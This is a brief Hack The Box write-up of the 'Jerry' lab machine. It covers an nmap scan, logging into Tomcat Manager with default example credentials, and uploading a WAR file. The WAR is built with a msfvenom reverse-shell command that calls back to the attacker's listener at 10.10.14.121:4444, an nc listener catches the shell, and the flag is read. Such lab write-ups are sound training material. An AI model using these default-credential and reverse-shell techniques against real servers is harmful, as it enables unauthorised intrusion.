# Jerry - HTB :mouse2: > [name=El Famoso] > [time=27 Dec 2023] So it's a basic Box challenge with only one service up a service tomcat. ``` Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-28 06:09 CET Nmap scan report for 10.129.136.9 Host is up (0.021s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-title: Apache Tomcat/7.0.88 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds ``` This nmap is short so it's nice, we where we should focus. Obvioulsy there is a TomCat service running on the port 8080. We can use the navigator to access ce webpage.  We can try to access to the page server status, manager app or host manager which seems to be interesting. I tried the `admin:admin` combination on and it worked ! But for the Manager App i didn't had the right to access.  On the 403 page we see an error message that explain how to add a username to the manager-gui. I tried this example because people follow tutorial often without thinking of changing exemple passwords. And it worked ! I have access to the manager page ! From there we can upload a war file with a reverse shell to gain access to the machine. Here is how i pack the payload : ```bash msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.121 LPORT=4444 -f war > sh3ll.war nc -lvnp 4444 (on another terminal ofc) ```  And we are root so we can display the flag that are in the folder `C://Users/Administrator/Desktop`  What i learned : * Reverse shell can be pain in the ass * The use of msfvenom / metasploit is cool i will use it more often * `more 2*`